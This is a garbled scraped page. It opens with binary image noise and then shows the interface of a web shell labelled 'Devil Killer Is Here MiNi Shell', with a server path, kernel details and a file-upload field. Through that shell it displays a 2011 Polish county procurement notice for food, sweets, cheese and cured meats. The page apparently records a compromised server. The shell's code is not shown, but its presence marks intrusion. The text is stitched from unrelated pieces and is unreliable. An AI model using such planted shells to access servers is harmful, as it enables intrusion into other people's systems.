JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110506/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20110506/103164-N-2011.html

<p class="kh_header"><b>Żnin: Dostawa różnych produktów spożywczych, wędlin i sera żółtego  dla uczestników projektów Wyższe kwalifikacje - lepsza perspektywa oraz Nowa jakość kształcenia zawodowego w Powiecie Żnińskim realizowanych w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet IX. Rozwój wykształcenia i kompetencji w regionach, dofinansowanych ze środków Europejskiego Funduszu Społecznego Działanie 9.2 PO KL.</b><br>
<b>Numer ogłoszenia: 103164 - 2011; data zamieszczenia: 06.05.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Starostwo Powiatowe w Żninie , ul. Potockiego 1, 88-400 Żnin, woj. kujawsko-pomorskie, tel. 052 3031100, faks 052 3031302.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.powiat.znin.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa różnych produktów spożywczych, wędlin i sera żółtego  dla uczestników projektów Wyższe kwalifikacje - lepsza perspektywa oraz Nowa jakość kształcenia zawodowego w Powiecie Żnińskim realizowanych w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet IX. Rozwój wykształcenia i kompetencji w regionach, dofinansowanych ze środków Europejskiego Funduszu Społecznego Działanie 9.2 PO KL..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa różnych produktów spożywczych, wędlin i sera żółtego  dla uczestników projektów Wyższe kwalifikacje - lepsza perspektywa oraz Nowa jakość kształcenia zawodowego w Powiecie Żnińskim realizowanych w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet IX Rozwój wykształcenia i kompetencji w regionach, dofinansowanych ze środków Europejskiego Funduszu Społecznego Działanie 9.2 PO KL według poniższych części zamówienia:

CZĘŚĆ I ZAMÓWIENIA
Dostawa różnych artykułów spożywczych kawy, herbaty, cukru i napojów :
1. Kawa mielona Jacobs Kronung lub równoważna	500 g	100 % kawa drobno mielona, bez konserwantów, bez cukru, bez tłuszczu, bez laktozy, do parzenia w ekspresie oraz metodą tradycyjną	opakowanie próżniowe, zaznaczone miejsce do otwierania bez pomocy nożyczek, możliwość ponownego zamknięcia za pomocą ochronnej naklejki	80 szt
2. Kawa rozpuszczalna Jacobs Gronat Gold, Jacobs VELVET lub równoważna	200 g 100 %kawy naturalnej	słoik	120 szt
3. Kawa cappuccino Mokate cappuccino lub równoważna 	8*15g	saszetki w opakowaniu kartonowym	20 szt
4. Herbata Lipton expresowa lub równoważna	20 torebek piramidki, 375 sztuk w 5 różnych smakach, w tym czarna herbata piramidki w opakowaniu kartonowym 415 szt
5. Woda źródlana do picia Żywiec Zdrój lub równoważna	1,5 l	niegazowana butelka	200szt
6. Cukier 200 sztuk w saszetkach 5g Diamant lub równoważny	5g	biały kryształ 1s+= 1łyż.	saszetki w opakowaniu kartonowym	75 szt
7. Napój w kartonie Garden prosto z sadu lub równoważny	2l pomarańczowy, grapefruit, jabłkowy, czarna porzeczka	karton	200 szt
8. sok w kartoniku Cymes lub równoważny	0,2ml	ze słomką kartonik	8415 szt.

CZĘŚĆ II ZAMÓWIENIA
Dostawa słodyczy 
1. paluszki słone Lajkonik lub równoważne	200g		paczka	831 szt

2. ciasteczka korzenne w mlecznej czekoladzie ciastka krakuski barbakan ki  korzenne w czekoladzie mlecznej lub równoważne	170g	ciasteczka korzenne w mlecznej czekoladzie	paczka lub karton	240 szt
3. bombonierka kokosowa Rafaello lub równoważna	150g	chrupiący wafelek z całym migdałem w środku zatopionym w kremie na zewnątrz płatki kokosa paczka lub karton lub pudełko	80 szt
4. pierniczki w czekoladzie z nadzieniem owocowym
Pierniczki baśniowe SKAWA lub równoważne	150g	pierniczki z nadzieniem owocowym w czekoladzie	paczka lub karton	240 szt
5. ciastka owsiane De Lux TAGO
 lub równoważne	250g	ciasteczka owsiane	paczka lub karton	240 szt
6. bombonierka czekoladowa Ferrero Rocher lub równoważna	20g	na zewnątrz warstwa czekolady z kawałkami orzecha a pod nią jasnobrązowy wafel w kształcie kuli, orzech laskowy zatopiony w ciemnym kremie paczka lub karton lub pudełko	80 szt
7. ciastka wielozbożowe
Lu Go lub równoważne	300g	ciastka wielozbożowe	paczka lu
 karton	240 szt
8. ciastka deserowe z cukrem 
San Lakotki lub równoważne	148g	ciastka kruche z cukrem	paczka lub karton	200 szt
9. ciasteczka z kawałkami czekolady i bakaliami
Pieguski lub równoważne	135g	kruche ciasteczka z kawałkami czekolady, rodzynków, orzechów i kokosu.	paczka lub karton	250 szt
10. cukierki krówki Goplana lub równoważne	130g	mleczne krówki z nadziniem toffi	paczka lub karton	290 szt
11. herbatniki maślane herbatniki Krakuski maślane
lub równoważne	200g	maślane ciasteczka	paczka lub karton	230 szt
12. ciasteczka z bakaliami, orzechami, chrupkami ryżowymi i karmelem w czekoladzie
Jeżyki - Jutrzenka lub równoważne	140g	Ciastka z orzechami laskowymi, karmelem i chrupkami ryżowymi, oblane mleczną czekoladą. W trzech różnych rodzajach. paczka lub karton	2001 draże w mlecznej czekoladzie
Jutrzenka lub równoważne	80g migdały w czekoladzie - 70 szt.
wiśnie w czekoladzie -70 szt orzechy laskowe w czekoladzie - 60 szt. paczka lub karton	200 szt
14. cukierki  trufle cukierki Wawel trufle w czekoladzie lub równoważne 30g cukierki w czekoladzie deserowej o smaku rumowym	paczka lub karton	135 szt
15. cukierki w czekoladzie z orzechowym nadzieniem
cukierki Michałki zamkowe Wawel lub równoważne	280g	cukierki w czekoladzie z orzechowym nadzieniem	paczka lub karton	150 szt
16. ciastka z galaretką i biszkoptem w czekoladzie
Wedel - delicje szampańskie lub równoważne	147g	galaretka i biszkopt w czekoladzie	paczka lub karton	230 szt

CZĘŚĆ III ZAMÓWIENIA
Dostawa sera żółtego 
1. Ser żółty Mlekpol Królewski z Kolna lub równoważny	0,15 kg	w plastrach hermetyczne pakowanie 40 szt

CZĘŚĆ IV ZAMÓWIENIA
Dostawa wędlin 
1. Szynka wieprzowa gotowana Morliny lub równoważna	0,15 kg	w plastrach hermetyczne pakowanie	55 szt
2. Szynka wieprzowa Morliny lub równoważna	0,15 kg	w plastrach hermetycznepakowanie	55 szt
3. Kiełbasa salami Morliny salami ostródzkie	100g	w plastrach hermetycznepakowanie 55 szt
4. Kiełbasa sucha krakowska sucha Krakus lub równoważna	320g	w całości	hermetyczne pakowanie	40 szt
5. Kabanosy Krakus lub równoważne	180g	w całości	hermetyczne pakowanie 40 szt
2. Zamawiający dopuszcza składanie ofert równoważnych: zaoferowane przez Wykonawcę artykuły nie mogą być gorsze pod względem składu, smaku, estetyki wyrobu i opakowania niż podane przez Zamawiającego w formularzu ofertowym. Jednostki podane w kolumnach od 2 do 6 formularza ofertowego (opis artykułu, opakowanie, gramatura itp.) stanowią wartość minimalną.
3. Dostawy realizowane będą w ilościach i asortymencie zgodnie z harmonogramem dostaw stanowiącym załącznik do umowy w następujących terminach:
1)	Dla części I - w trzech etapach
	do 20 czerwca 2011r.
	do 31 sierpnia 2011r.
	do 5 stycznia 2012r.
	
2)	Dla części II - w trzech etapach
	 do 20 czerwca 2011r.
	do 31 sierpnia 2011r.
	do 5 stycznia 2012r.
3)	Dla części III - jednorazowo do 20 czerwca 2011
4)	Dla części IV - jednorazowo do 20 czerwca 2011
4.  W uzasadnionych okolicznościach Zamawiający zastrzega sobie prawo zmiany harmonogramu dostaw. 
5. Dostawy każdorazowo zostaną poprzedzone stosownym zamówieniem sporządzonym przez Zamawiającego. Wykonawca zobowiązuje się wykonać przedmiot zamówienia w terminie 3 dni od 
daty złożenia przez Zamawiającego ww. zamówienia. 
6. Wykonawca zobowiązany będzie dostarczać przedmiot zamówienia do siedziby Starostwa Powiatowego w Żninie własnym transportem wraz z rozładunkiem i wniesieniem do pomieszczeń wskazanych przez Zamawiającego, na własny koszt, bez obciążania z tego tytułu Zamawiającego dodatkowymi kosztami.
7.  Artykuły spożywcze będące przedmiotem dostawy winny być opatrzone etykietą określającą m.in. ich wagę/pojemność i termin przydatności do spożycia. Ustala się, iż termin przydatności do spożycia serów (część III zamówienia) i wędlin (część IV zamówienia) nie może być krótszy niż 30 dni od dnia dostawy, a termin przydatności słodyczy (część II zamówienia) oraz napojów, kawy, herbaty i cukru (część I zamówienia) nie może być krótszy niż 6 miesięcy od dnia dostawy..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>1. Zamawiający przewiduje w okresie 3 lat od udzielenia niniejszego zamówienia podstawowego udzielenia Wykonawcy zamówień uzupełniających.
2. Zamówienia te będą polegały na powtórzeniu tego samego rodzaju prac, jak te, które stanowią przedmiot niniejszego zamówienia podstawowego  określonego w SIWZ.
3. Zamówienia uzupełniające będą stanowiły nie więcej niż 10 % wartości zamówienia podstawowego.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6, 15.13.11.30-5, 15.54.30.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 05.01.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga od Wykonawców wnoszenia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Weryfikacja spełnienia warunku będzie następować na podstawie złożonego oświadczenie o spełnianiu warunków udziału w postępowaniu o udzielenie zamówienia publicznego zgodnie z art. 22 ustawy</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Weryfikacja spełnienia warunku będzie następować na podstawie złożonego oświadczenie o spełnianiu warunków udziału w postępowaniu o udzielenie zamówienia publicznego zgodnie z art. 22 ustawy</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Weryfikacja spełnienia warunku będzie następować na podstawie złożonego oświadczenie o spełnianiu warunków udziału w postępowaniu o udzielenie zamówienia publicznego zgodnie z art. 22 ustawy</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Weryfikacja spełnienia warunku będzie następować na podstawie złożonego oświadczenie o spełnianiu warunków udziału w postępowaniu o udzielenie zamówienia publicznego zgodnie z art. 22 ustawy</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Weryfikacja spełnienia warunku będzie następować na podstawie złożonego oświadczenie o spełnianiu warunków udziału w postępowaniu o udzielenie zamówienia publicznego zgodnie z art. 22 ustawy</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Wykonawca zobowiązany będzie dostarczać przedmiot zamówienia do siedziby Starostwa Powiatowego w Żninie własnym transportem wraz z rozładunkiem i wniesieniem do pomieszczeń wskazanych przez Zamawiającego, na własny koszt, bez obciążania z tego tytułu Zamawiającego dodatkowymi kosztami.
2. Artykuły spożywcze będące przedmiotem dostawy winny być opatrzone etykietą określającą m.in. ich wagę/pojemność i termin przydatności do spożycia. Ustala się, iż termin przydatności do spożycia serów (część III zamówienia) i wędlin (część IV zamówienia) nie może być krótszy niż 30 dni od dnia dostawy, a termin przydatności ważności słodyczy (część II zamówienia) oraz napojów, kawy, herbaty i cukru (część I zamówienia) nie może być krótszy niż 6 miesięcy od dnia dostawy.
3. Zamawiający zawiera umowę w sprawie zamówienia publicznego w terminie nie krótszym niż  4 dni od dnia przesłania zawiadomienia o wyborze najkorzystniejszej oferty, jeżeli zawiadomienie to zostało przesłane faksem albo 10 dni - jeżeli zostało przesłane w inny sposób.

4. Zamawiający może żądać przed zawarciem umowy w sprawie zamówienia publicznego umowy regulującej współpracę Wykonawców wspólnie ubiegających się o udzielenie zamówienia.
5. Jeżeli Wykonawca, którego oferta została wybrana, uchyla się od zawarcia umowy w sprawie zamówienia publicznego Zmawiający może wybrać ofertę najkorzystniejszą spośród pozostałych ofert, bez przeprowadzania ich ponownego badania i oceny, chyba że zachodzą przesłanki un1.  Z Wykonawcą, którego oferta zostanie uznana przez Zamawiającego za ofertę najkorzystniejszą, 
zostanie zawarta umowa w terminie ustalonym zgodnie z zasadą określoną   w art. 94 ust. lub 2 ustawy Prawo zamówień publicznych.
6. Zmiana  umowy musi być zgodna z art. 144  ustawy Prawo zamówień publicznych oraz wymaga formy pisemnej pod rygorem nieważności.
7. Zamawiający może odstąpić od umowy ze skutkiem natychmiastowym, jeżeli Wykonawca rażąco naruszy postanowienia umowy, niezależnie od zaistnienia przesłanek z art. 144 Prawa zamówień publicznych. Zgodnie z treścią art. 144 Zamawiający przewiduje możliwość dokonania zmian postanowień umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, w zakresie
7.1  Zmiany   zakresu   przedmiotu   zamówienia   pod   warunkiem,  że  są   korzystne  dla 
Zamawiającego lub zaszły okoliczności, których nie można było przewidzieć w chwili zawarcia umowy
7.2  Zmiany terminu wykonania zamówienia w następujących przypadkach:
1) wystąpienia  siły wyższej.  Siła  wyższa  oznacza   wydarzenia   nieprzewidywalne  i  poza      kontrolą Stron niniejszej umowy, występujące po podpisaniu umowy, a powodujące niemożliwość wywiązania się z umowy w jej obecnym  brzmieniu
2)  wystąpienia w trakcie realizacji zamówienia zmian przepisów prawa Unii Europejskiej lub prawa krajowego, co wpłynie na realizację zamówienia i spowoduje konieczność dostosowania opracowania do zmian przepisów
7.3 Innych uzasadnionych przyczyn pod warunkiem, że są korzystne dla Zamawiającego lub zaszły okoliczności, których nie można było przewidzieć w chwili zawarcia umowy
7.4 W przypadku wystąpienia okoliczności stanowiących podstawę do zmian postanowień  umowy Wykonawca zobowiązany jest do niezwłocznego poinformowania o tym fakcie Zamawiającego i wystąpienia z wnioskiem o dokonanie zmian w przedmiotowej umowie.
8.Odstąpienie od  umowy przez Zamawiającego może nastąpić
1) W razie zaistnienia istotnej zmiany okoliczności powodującej, że wykonanie umowy nie leży w interesie publicznym, czego nie można było przewiedzieć w chwili zawarcia umowy,  zamawiający może odstąpić od umowy w terminie 30 dni od powzięcia wiadomości o tych okolicznościach,
2) W przypadku o którym mowa w niniejszym ustępie pkt 1, Wykonawca może żądać wyłącznie wynagrodzenia należytego z tytułu wykonania części umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.powiat.znin.pl w katalogu Zamówienia Publiczne<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Żninie
ul. Potockiego 1
biuro nr 12 I piętro.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.05.2011 godzina 09:00, miejsce: Starostwo Powiatowe
w Żninie
ul. Potockiego 1
Sekretariat Starosty Żnińskiego pokój nr 19 I piętro.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Program Operacyjny Kapitał Ludzki, Priorytet IX. Rozwój wykształcenia i kompetencji w regionach, dofinansowanych ze środków Europejskiego Funduszu Społecznego Działanie 9.2 PO KL..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> DOSTAWA RÓŻNYCH ARTYKUŁÓW SPOZYWCZYCH, HERBATY, CUKRU I NAPOJÓW.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Kawa mielona Jacobs Kronung lub równoważna 500 g	100 % kawa drobno mielona, bez konserwantów, bez cukru, bez tłuszczu, bez laktozy, do parzenia w ekspresie oraz metodą tradycyjną opakowanie próżniowe, zaznaczone miejsce do otwierania bez pomocy nożyczek, możliwość ponownego zamknięcia za pomocą ochronnej naklejki	80 szt
2.Kawa rozpuszczalna Jacobs Gronat Gold, Jacobs VELVET lub równoważna 200 g100 % kawy naturalnej	słoik	120 szt
3. Kawa cappuccino Mokate cappuccino lub równoważna	8*15g	saszetki w opakowaniu kartonowym	20 szt
4. Herbata Lipton expresowa lub równoważna	20 torebek piramidki, 375 sztuk w 5 różnych smakach, w tym czarna herbata piramidki w opakowaniu kartonowym
415 szt.
5. Woda źródlana do picia Żywiec Zdrój lub równoważna	1,5 l niegazowana	butelka  200 szt
6. Cukier 200 sztuk w saszetkach 5g Diamant lub równoważny	5g	biały kryształ 1s+= 1łyż.	saszetki w opakowaniu kartonowym	75 szt
7. Napój w kartonie Garden prosto z sadu lub równoważny 2l pomarańczowy, grapefruit, jabłkowy, czarna porzeczka	karton	200 szt
8. sok w kartoniku Cymes lub równoważny 0,2ml ze słomką kartonik	8415 szt.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 05.01.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> DOSTAWA SŁODYCZY.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. paluszki słone Lajkonik lub równoważne	200g		paczka	831 szt

2. ciasteczka korzenne w mlecznej czekoladzie ciastka krakuski barbakan ki  korzenne w czekoladzie mlecznej lub równoważne	170g	ciasteczka korzenne w mlecznej czekoladzie paczka lub karton	240szt
3. bombonierka kokosowa Rafaello lub równoważna	150g	chrupiący wafelek z całym migdałem w środku zatopionym w kremie na zewnątrz płatki kokosa	paczka lub karton lub pudełko	80 szt
4. pierniczki w czekoladzie z nadzieniem owocowym Pierniczki baśniowe SKAWA lub równoważne	150g	pierniczki z nadzieniem owocowym w czekoladzie paczka lub karton	240 szt
5. ciastka owsiane De Lux TAGO lub równoważne	250g	ciasteczka owsiane	paczka lub karton	240 szt
